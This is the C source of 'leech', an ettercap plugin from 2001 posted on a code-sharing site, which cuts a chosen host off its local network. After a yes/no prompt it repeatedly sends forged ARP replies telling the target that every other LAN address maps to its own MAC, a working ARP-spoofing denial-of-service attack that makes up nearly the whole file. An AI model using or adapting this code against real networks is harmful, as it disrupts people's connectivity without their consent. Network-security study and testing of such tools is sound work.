leech.c
上传用户:nilegod
上传日期:2007-01-08
资源大小:220k
文件大小:3k
源码类别:

网络截获/分析

开发平台:

C/C++

  1. /*
  2.     leech -- ettercap plugin -- Isolate an host from the lan
  3.     Copyright (C) 2001  NaGoR
  4.     This program is free software; you can redistribute it and/or modify
  5.     it under the terms of the GNU General Public License as published by
  6.     the Free Software Foundation; either version 2 of the License, or
  7.     (at your option) any later version.
  8.     This program is distributed in the hope that it will be useful,
  9.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  10.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  11.     GNU General Public License for more details.
  12.     You should have received a copy of the GNU General Public License
  13.     along with this program; if not, write to the Free Software
  14.     Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
  15. */
  16. #include <unistd.h>
  17. #include "../../src/include/ec_main.h"                   // required for global variables
  18. #include "../../src/include/ec_plugins.h"                // required for input/output
  19. #include "../../src/include/ec_inet_structures.h"
  20. #include "../../src/include/ec_inet.h"
  21. #include "../../src/include/ec_inet_forge.h"
  22. char Ettercap_Version[] = VERSION;                       // required -- for compatibility
  23. char PlugIn_Info[] = "Isolate a host from the LAN";
  24. short PlugIn_Version = 6;
  25. void PlugIn_Start(char**argv)
  26. {
  27.     int IPS, IPD, sock, i;
  28.     unsigned char MACS[6];
  29.     unsigned char MACD[6];
  30.     char *pck_to_send;
  31.     char cont[4];
  32.     if (!strcmp(Host_Dest.ip,""))
  33.     {
  34.       Plugin_Output("Please select a Dest...n");
  35.       return;
  36.     }
  37.     memset(cont, 0, 4);
  38.     Plugin_Output("Are you sure you want to isolate %s ? (yes/no) ", Host_Dest.ip );
  39.     Plugin_Input(cont, 3, P_BLOCK);
  40.     if (strcmp(cont, "yes"))  // not sure... ;)
  41.     {
  42.       Plugin_Output("nIt is safe!  for now...n");
  43.       return;
  44.     }
  45.     Plugin_Output("nBuilding host list for netmask %s, please wait...n", Inet_MySubnet());
  46.          number_of_hosts_in_lan = Inet_HostInLAN();
  47.     for (i=0; i<number_of_hosts_in_lan; i++)
  48.         if (!strcmp(Host_Dest.ip, Host_In_LAN[i].ip))
  49.        Inet_GetMACfromString(Host_In_LAN[i].mac, MACD);
  50.     IPD = inet_addr(Host_Dest.ip);
  51.     sock = Inet_OpenRawSock(Options.netiface);
  52.     Inet_GetIfaceInfo(Options.netiface, 0, MACS, 0, 0);
  53.     pck_to_send = (char *)Inet_Forge_packet( ETH_HEADER + ARP_HEADER );
  54.     Inet_Forge_ethernet( pck_to_send, MACS, MACD, ETH_P_ARP );
  55.     Plugin_Output("nIsolating host %s...",Host_Dest.ip);
  56.     Plugin_Output("Press return to stop");
  57.     for (;;)
  58.     {
  59.       int i;
  60.       for (i=0; i<number_of_hosts_in_lan; i++)
  61.       {
  62.          IPS=inet_addr(Host_In_LAN[i].ip);
  63.          if (IPS!=IPD)
  64.          {
  65.             Inet_Forge_arp( pck_to_send+ETH_HEADER, ARPOP_REPLY, MACD, IPS, MACD, IPD);
  66.             Inet_SendRawPacket(sock, pck_to_send, ETH_HEADER + ARP_HEADER);
  67.          }
  68.       }
  69.       sleep(2);
  70.       if (Plugin_Input(cont, 1, P_NONBLOCK))
  71.       {
  72.          Inet_Forge_packet_destroy( pck_to_send );
  73.          close(sock);
  74.          return;
  75.       }
  76.     }
  77. }
  78. /* EOF */